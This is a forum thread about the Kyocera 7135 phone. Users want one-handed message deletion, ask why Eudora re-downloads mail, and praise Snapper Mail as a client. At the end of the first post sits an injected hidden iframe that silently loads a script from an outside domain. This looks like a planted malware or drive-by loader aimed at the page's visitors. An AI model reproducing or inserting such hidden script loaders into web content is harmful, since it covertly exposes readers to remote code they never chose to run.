+ Reply to Thread

Message Checking/Deleting

Is it me or does anyone else miss being able to check messages one handed using the 7135. I know we don't have the scroll wheel anymore and at the very least I can open the phone, press the messages button, use the the up/down and enter button to navigate but once I get to a message there's just no way other than touching the screen or pulling out the stylus to delete messages.
    Ugh! Wish I could use the up/down buttons to navigate the menu items.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I agree. Checking messages without the stylus is awkward. I also have a somewhat related issue. I check my office e-mail using Eudora on the 7135 and have it set to leave messgaes on the server so I can also download them when I am back in the office. However, Eudora does not seem to keep track of the messages it has already downloaded, so if I check messages more than once before I download them from the office (and clear them from the server) Eudora downloads all of them again. Does anyone know how to fix this? When I used the now defunct Omnisky, it would keep track of what it previously downloaded.

Mine doesn't do that. It only pulled them once. I use snapper mail now though for native attachment support, and a much better interface.

Originally posted by HoTSynC
    Mine doesn't do that. It only pulled them once. I use snapper mail now though for native attachment support, and a much better interface.
    Thanks, I'll mess around with the settings and see what happens. I've seen a number of people recommend Snapper Mail, so I may try it. The website says it's a Public Beta. Is it stable or am I testing it for them for a fee?

It's pretty stable, I haven't had any problems. Your fee will get you a copy of the production release as well.

It is VERY stable. I LOVE it.
    ~'kito
    pdaPhoneHome Moderator

I'm going to give it a try.

I'm still waiting for them to include all the viewers they say are "still coming" I really want to get away from having to use several products to do one thing.

And I still wish I could read my messages one handed....but that's just the stubbornness in me I guess....